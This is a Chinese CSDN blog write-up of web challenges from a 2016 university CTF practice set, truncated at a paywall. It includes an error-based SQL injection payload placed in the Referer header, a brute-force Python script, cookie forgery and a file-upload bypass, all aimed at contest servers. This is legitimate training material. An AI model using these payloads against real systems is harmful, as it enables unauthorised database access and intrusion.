2016合天全国高校网安联赛专题赛--赛前指导练习题web进阶篇Writeup

最新推荐文章于 2022-10-20 22:28:55 发布
最新推荐文章于 2022-10-20 22:28:55 发布
阅读量4.3k 收藏 2
点赞数 1
分类专栏: WriteUp Web 文章标签: web writeup x-nuca ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19876131/article/details/52032633
版权
本文详细介绍了2016年合天全国高校网安联赛中关于Web进阶的题目,包括源码分析、参数修改、PHP代码审计、HTTP头注入、文件上传漏洞、命令执行等,涉及多种解题技巧和安全漏洞利用。
摘要由CSDN通过智能技术生成

讲真,这次的题确实价值不很大,脑洞太多了,而且很多无意义的脑洞,不过个别题还可以,另外第16题和21题没有做出来,希望有做出来的菊苣给点hint

题目1

先看源码,然后看到可以链接Index.php

跟过去看到flag

A HIDDEN FLAG: FLAG{th!5!5n0tth3fl@g}

题目2

先用firefox把submit的disable去掉
然后勾选好抓包,把提交参数修改如下:

[object Object]

题目3

同样抓包,把cookie中的Member参数修改为Admin的base64的编码
这里写图片描述

题目4

一道简单php代码审计

payload如下:


http://218.76.35.75:20114/?foo={"bar1":"2017f","bar2":[[1,1],1,1,1,1]}&cat[0]=123&cat[1][]=1&dog=%00htctf2016

拿到flag


flag{php_i5_n0t_b4d}

题目5

bobsam的MD5解出来分别是bob317sam429,没有什么规律,写个脚本简单爆破一下slash后面的数字,


import requests

import hashlib

r=requests.session()

url="http://218.76.35.75:20115/index.php"

for i in xrange(1000):

    header={
  "User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"}

    param=hashlib.md5("slash"+str(i)).hexdigest()

    tmpurl=url+"?page="+param

    print tmpurl

    result=r.get(tmpurl,headers=header)

    content=result.content

    if 'flag' in content or 'Flag' in content or 'FLAG' in content:

        print content

        print i

        break

爆破出数字是723,脚本截图

这里写图片描述

题目6

根据提示,是http头的注入,那就把头全都试一遍,发现注入点在referer参数,然后简单试试,发现可以报错注入,懒得写脚本了,这里也没啥过滤,直接暴库就可以了。

爆出的数据库名为ctf

该数据库里面有flagvisits两张表

然后在flag表里面有idflag两列

最后的payload如下:

2',extractvalue(1,concat(0x3c,(select group_concat(id,"==",flag) from flag))))#

结果截图如下
这里写图片描述

题目7

看题目,随便先上传一个图片,提示

这里写图片描述

随便上传个php又提示说只要jpg文件,ssctf2016的原题一枚

参照乌云漏洞:http://www.wooyun.org/bugs/wooyun-2015-0125982

如下图,把multipart/form-data变换一下大小写,再把第二个Content-T

最低0.47元/天 解锁文章
Bendawang
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
BugkuCTF-WEB进阶
Alita_lxz的博客
11-10 349
BugkuCTF-WEB进阶-第1题到第11题
网络全题库(汇总1000题).pdf
12-02
亲测好用,挺不错的资源,需要的人,就快来下载吧!很有用的!网络全题库(汇总1000题) 希望大家刷题过关,考试顺利!
2016合天全国高校网联赛专题--赛前指导练习题web进阶篇
07-26
2016合天全国高校网联赛7月赛前指导练习题web进阶篇
ctf网络全攻防练习题
12-04
ctf网络全攻防练习题 从N=NP能得到的结论当然是N=1或者P=0,然后结合图片内容,猜测此题跟二进制01有关,信息应该藏在像素中等等
合天全实验室CTF之基础50
何彬的博客
01-31 5583
此题是最基础的,下载下来,乍看是一个exe文件,用记事本打开,发现是个明文: flag{666C61677B68315F6337667D} 此时按照说明提交flag里面的值,唉,不对呀,一定是这串是密文,长度是24,不是md5码,猜测是十六进制码,查找acsii码表: ok,查表得出源码:flag{h1_c7f} 提交h1_c7f,通过!
资料源码-2018全国大学生信息全竞web题出题docker+writeup.zip
最新发布
01-25
RoboMaster、RoboCon、“西门子杯”中国智能制造挑战、中国大学生计算机设计大、世界技能大、中国高校计算机大-大数据挑战、团体程序设计天梯、移动应用创新、网络技术挑战全国大学生信息全竞...
网络全管理职业技能竞Web writeup_合天学院-程序员宝宝 - 程序员宝宝1
08-03
网络全管理职业技能竞 Web writeup 本文将围绕网络全管理职业技能竞 Web writeup 进行详细的知识点讲解。 网络全管理职业技能竞 Web writeup 介绍 网络全管理职业技能竞 Web writeup 是一个关于...
Venom-2021-强网拟态防御国际精英挑战-WriteUp1
08-03
本篇WriteUp主要介绍了Venom-2021强网拟态防御国际精英挑战中的一个Web挑战题,涉及到Node.js、Express框架、JavaScript、Crypto库、Cookie会话等技术。下面我们将逐步解析挑战题的源代码,了解到挑战的设计思路和...
2022-工大抗疫-web-writeup1
08-03
2022-工大抗疫-web-writeup1 本资源摘要信息聚焦于Web全和网络协议相关知识点,涵盖了HTML、PHP、网络协议和Windows操作系统等多个方面。 一、网络协议 在Web开发中,网络协议扮演着重要角色。HTTP/1.1是目前最...
wani-writeup:大阪大学CTF团队Wani Hackase提供的CTF解决方案
04-30
Wani Hackase撰写 大阪大学CTF团队Wani Hackase提供的CTF解决方案 这是大阪大学CTF团队Wani Hackase的写存储区。 如何使用 /YYYY/MM-eventName/problemFormat-problemName/README.md # Example ...
CTF_Web:攻防世界高手区进阶题WP(1-4)
AFCC_的博客(Web_Dog)
08-06 1051
0x00 前言 Web高手进阶区的题是对信息搜集、协议理解、php语法掌握等进阶知识的考查,越往后,题目越难,也不知道自己可以做到第几,持续更新吧。 0x01 baby_web 题目描述: 想想初始页面是哪个 打开之后发现初始路径为1.php,平常我们使用最常见的首页面为index.php,输入url测试,发现立即跳转到了1.php,本题目考察302跳转的知识,使用burp抓包跟进即可。 0x02 Training-WWW-Robots 根据题目名称可知本题考查robots.txt知识。 根据提示访问f
CTFHUB web进阶学习
Je3Z的博客
09-12 1278
CTFHub之web进阶学习 Linux 动态加载器 ctfhub 动态加载器 linux–>ldd命令的介绍 就是没有x执行程序的权限,然后我们要执行/readflag来拿到flag,这里就用到了linux动态库链接器/加载器ld-linux.so.2 这里我们直接ldd /readflag 列出所需要得动态链接库 然后再/lib64/ld-linux-x86-64.so.2 /readflag 即可获取flag php Bypass disable_function LD_PRELOAD Linu
bugkuCTF web进阶+web最后两题
goddemon
10-17 400
bugkuCTF一些题目 江湖魔头 ①js文件类–>js文件被压缩 解压缩方法–>在该网站解压缩即可 https://tool.lu/js/ ②伪造cookie 1.解密与获取cookie类 获取cookie var test=getCookie(‘user’); 解密cookie类 test=decodeURIComponent(test)//-->解密url编码 test=decode_create(test)//-->按base64进行解密类 进行更改cookie te
[CTF]攻防世界web高手进阶区Writeup(更新ing)
糖小喵
04-29 463
baby_web 解题方法: F12→Networks→刷新抓包→完成
CTFweb入门(持续更新…)
qq_41046545的博客
10-20 2004
web入门
bugku web进阶。。buuctf web
gudugeji的博客
01-17 451
1 phpcmsv9 御剑扫描,访问.txt的网址,发现flag 2
2017合天全国高校网联赛专题--赛前指导练习题web进阶篇Writeup
4ct10n
08-14 4751
趁着放假,再刷一波题目
两种方法解 Limited Access ( Exploit, HTTP )
滕青山博客
02-19 578
问题 这道题比上一道题就是多禁了几个 http method,但是并没有禁完。所以可以使用TO来请求。 解决 burpsuite 详细可以参考:WeChall-writeup-6-11.24(Limited Access Too;Shadowlamb - Chapter I) - Crystal_bing的博客 - CSDN博客 主要是Repeater->Request栏中GET方法改为TO方法->点击GO Curl curl -v -H "Cookie: WC=这里输入你的co
解 [WeChall] Limited Access (Exploit, HTTP)
滕青山博客
02-18 359
题目 目的:访问受保护页面protected/protected.php 查看代码发现只是限制了get请求,但是HTTP有请求:GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, PATCH, PROPFIND, PROPPATCH, LOCK, UNLOCK, TRACE 解决 hackbar 火狐浏览器下使用hackbar插件提交post请求。 Firefox的插件是要经过签名,才能加载到浏览器的。如果修改插件里的任何一个配置文件都会导致签名失效。
"Venom-2021国际精英挑战强网拟态防御WriteUp1
2021年强网拟态防御国际精英挑战Venom于2021年举行,是一场涉及Web全领域的国际竞。比中出现了一个值得关注的WriteUp1,其中涉及到了一个能够读取系统文件的漏洞代码示例:readFile('/etc/passwd')。在这个...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值